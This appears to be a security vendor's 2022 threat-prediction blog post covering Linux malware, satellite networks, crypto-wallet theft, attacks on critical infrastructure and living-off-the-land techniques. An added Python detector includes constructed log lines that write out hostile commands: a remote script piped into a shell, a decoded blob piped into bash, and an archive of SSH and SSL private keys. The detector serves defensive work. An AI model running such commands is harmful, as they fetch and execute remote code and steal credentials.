In 2022, threats are unlikely to slow down. In fact, our experts predict that cyberattacks will increase in 2022. This is unfortunate news, especially as the attack surface continues to expand.
For organizations struggling to integrate and manage a collection of single-purpose products, the resulting complexity and lack of visibility is likely to leave them at risk. They must work to close these security gaps as quickly as possible, but they need to know where to focus.
More than half of organizations face gaps in their zero trust implementations
Ransomware attacks grew tenfold between July 2020 and July 2021
51% of organizations experienced operational technology (OT) attacks that impacted productivity, and 45% experienced OT attacks that endangered an employee’s physical safety.
Despite many organizations putting their best foot forward to protect their networks, they still face risks. Minimizing this risk will require them to start preparing for emerging cyberthreats today. And while no one can predict the future, here are five up-and-coming threats we're keeping an eye on at FortiGuard Labs.
Up until recently, Linux has been largely ignored by cybercriminals, but that's changing. Because Linux runs the back-end systems of many networks and container-based solutions for IoT devices and mission-critical applications, it's becoming a more popular target for attackers. At this point, attacks against Linux operating systems and applications running on those systems are as prevalent as attacks on Windows operating systems.
Many organizations are used to defending against Windows attacks but are far less practiced at Linux defense and Linux malware analysis. Even worse, Linux environments often hold valuable data such as Secure Shell (SSH) credentials, certificates, application usernames, and passwords.
A malicious re-implementation of the Beacon feature of Cobalt Strike, called Vermilion Strike, can target Linux systems with remote access capabilities without being detected. Now that Microsoft is actively integrating Windows Subsystem for Linux (WSL) into Windows 11, it's inevitable that malware will follow. WSL is a compatibility layer used for running Linux binary executables natively on Windows. More botnet malware is being written for Linux platforms as well. The recent Log4J vulnerability is another good example of an attack where we are seeing Linux binaries capitalize on the opportunity.
As connectivity using satellite internet increases, the likelihood of new exploits targeting these networks will increase correspondingly. At this point, about a half dozen major satellite internet providers are already in place. The biggest targets will be organizations that rely on satellite-based connectivity to support low-latency activities, like online gaming or delivering critical services to remote locations, as well as remote field offices, pipelines, or cruises and airlines. This will also expand the potential attack surface as organizations add satellite networks to connect previously off-grid systems, such as remote OT devices, to their interconnected networks.
In an increasingly digitized world, crypto wallets are a new risk: more malware is being designed to target stored information, allowing attackers to steal credentials such as a bitcoin private key, bitcoin address, crypto wallet address, and other significant information, and then drain the digital wallet. Attacks often start as a phishing campaign that uses the classic strategy of attaching a malicious Microsoft Word document to a spam email. The malware is delivered by a Word document macro designed to steal crypto wallet information and credentials from the victims' infected devices.
Along the same lines, a new fake Amazon gift card generator targets digital wallets by replacing the victim’s wallet with that of the attacker. And a new remote access trojan (RAT) called ElectroRAT targets cryptocurrency. It combines social engineering with custom cryptocurrency applications and has the ability to perform keylogging, take screenshots, upload and download files, and execute commands.
Ransomware attacks are increasingly targeting critical infrastructure and the phrase “killware” has been used to describe some of these incidents. Although the attacks don't necessarily target human lives directly, the term is used because the malware that disrupts hospitals, pipelines, water treatment plants, and other critical infrastructure is different from regular exploits because of the direct impact they can have on people.
Cybercriminals may be moving away from smaller targets toward larger, more public attacks that affect the physical world, including supply chains and large numbers of human victims. The near-universal convergence of IT and OT networks has made it easier for attackers to reach OT systems through the compromised home networks and devices of remote workers. Adding to the risk is the fact that attackers no longer need specialized technical knowledge of ICS and SCADA systems, because they can now buy attack kits on the dark web.
The increase in the number of people working remotely has exposed corporate networks to many of the threats to residential networks. The increase in network edges means there are more places for "living off the land"-type threats to hide. With this technique, attackers use malware made from existing toolsets and capabilities within compromised environments so their attacks and data exfiltration look like normal system activity. Living off the land attacks also may be combined with edge access trojans (EATs), so new attacks will live off the edge, not just the land. While avoiding detection, the malware located in these edge environments can use local resources to keep an eye on activities and data at the edge and then steal, hijack, or even ransom critical systems, applications, and information.
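As an added illustration, not part of the original post, the following Python snippet shows the defender's side of the living-off-the-land problem on Linux: the built-in tools are legitimate, so detection has to key on their combination (a download piped straight into a shell, a decoded blob piped into a shell, or an archiver bundling the SSH keys and certificates mentioned above). The log format and all sample lines are constructed for this example.

```python
import re

# Constructed sample process log (not real telemetry): "<timestamp> <user> <command line>".
SAMPLE_LOG = """\
2022-01-10T08:00:01Z app  /usr/bin/python3 /opt/app/worker.py
2022-01-10T08:01:13Z www  bash -c "curl -s http://198.51.100.7/x.sh | sh"
2022-01-10T08:02:44Z www  bash -c "echo aGVsbG8= | base64 -d | bash"
2022-01-10T08:03:02Z app  tar czf /tmp/.k.tgz /home/app/.ssh/id_rsa /etc/ssl/private
2022-01-10T08:04:30Z app  ssh -i /home/app/.ssh/id_rsa deploy@10.0.0.5
2022-01-10T08:05:00Z root /usr/bin/apt-get update
"""

# Each rule is (name, regex over the command line). None of the tools is malicious
# on its own; the rules look for the chaining that typical LOTL activity relies on.
RULES = [
    ("download_pipe_to_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")),
    ("decoded_pipe_to_shell", re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(sh|bash)\b")),
    ("credential_collection", re.compile(r"^(tar|cp|cat|zip|scp)\b.*(/\.ssh/id_|/etc/ssl/private)")),
]


def parse_line(line):
    """Split one constructed log line into (timestamp, user, command line)."""
    ts, user, cmd = line.split(None, 2)
    return ts, user, cmd


def detect_lotl(log_text):
    """Return [(line_no, user, rule_name)] for every line that matches a rule."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        _, user, cmd = parse_line(line)
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append((n, user, name))
    return hits


if __name__ == "__main__":
    for hit in detect_lotl(SAMPLE_LOG):
        print(hit)
```

The plain `ssh -i ~/.ssh/id_rsa` line is deliberately left unflagged: reading a key with the SSH client is normal use, while bundling it with an archiver is the pattern worth alerting on.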
To prepare for 2022, organizations should certainly make it a priority to harden both Linux and Windows-based systems. And when adopting new technology, organizations should always take a security-first approach; in other words, before adding new connections such as satellite-based connectivity, make sure it's protected.
But you must also keep in mind the fact that cybercriminals will continue using tactics as long as they keep working. Along with preparing for new threats, you can't forget about what's already out there. Defending against both new and existing threats requires an integrated approach to security. To fight today's evolving threats, organizations should look into a security platform based on a cybersecurity mesh architecture with security solutions that are designed to work together.
Learn more about upcoming threat trends in the full Threat Predictions perspective from Fortinet’s FortiGuard Labs team.